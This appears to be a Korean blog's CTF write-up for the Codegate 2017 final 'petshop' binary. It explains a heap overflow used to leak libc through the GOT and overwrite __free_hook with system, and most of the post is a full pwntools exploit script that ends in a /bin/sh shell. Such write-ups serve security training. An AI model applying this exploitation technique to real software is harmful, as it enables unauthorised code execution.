- 
          
          Codegate 2017 final petshopPwnable/CTF 2018. 3. 22. 23:40취약점은 힙 오버플로우가있고 난이도는 쉽다. string객체를 got로 덮어서 릭을하고 freehook을 시스템으로 덮고 (왜 freehook을 덮었는지 모르겠다 ㄷㄷ) ~basic string 같이 소멸자에서 free가 실행되기 때문에 이것을 이용하여서 문제를 풀었다. 123456789101112131415161718192021222324252627282930313233343536from pwn import *def set_pet(name,sound,feed):p.sendlineafter('select:','4')p.sendlineafter('set:','1')p.sendlineafter(':',name)p.sendlineafter(':',sound)p.sendlineafter(':',feed)p=process('./petshop')p.sendlineafter(':','1')p.sendlineafter(':','1')p.sendlineafter('select:','6')p.sendlineafter('name?','AAAA')set_pet('A','B','C'*12+p64(0x604088)+p64(0x8))p.sendlineafter('select:','5')p.recvuntil('person:')strcpy = u64(p.recv(8))libc_base = strcpy - 0x16bca0system = libc_base + 0x47dc0free_hook = libc_base + 0x3dc8a8malloc_hook = libc_base + 0x3dac10print hex(strcpy)print hex(libc_base)print hex(free_hook)set_pet('A','B','C'*12+p64(free_hook)+p64(8))p.sendlineafter('select:','6')p.sendlineafter('name?',p64(system))set_pet('A','B','C'*12+p64(malloc_hook)+p64(8))p.sendlineafter('select:','6')p.sendlineafter('name?','/bin/sh\x00')p.sendlineafter('select:','2')p.interactive()cs 'Pwnable > CTF' 카테고리의 다른 글Codegate 2018 Final (0) 2018.04.10 Codegate 2017 final VM (0) 2018.03.22 Codegate 2015 final yocto (0) 2018.02.21 Codegate 2018 zoo (0) 2018.02.11 Codegate 2018 melong (2) 2018.02.07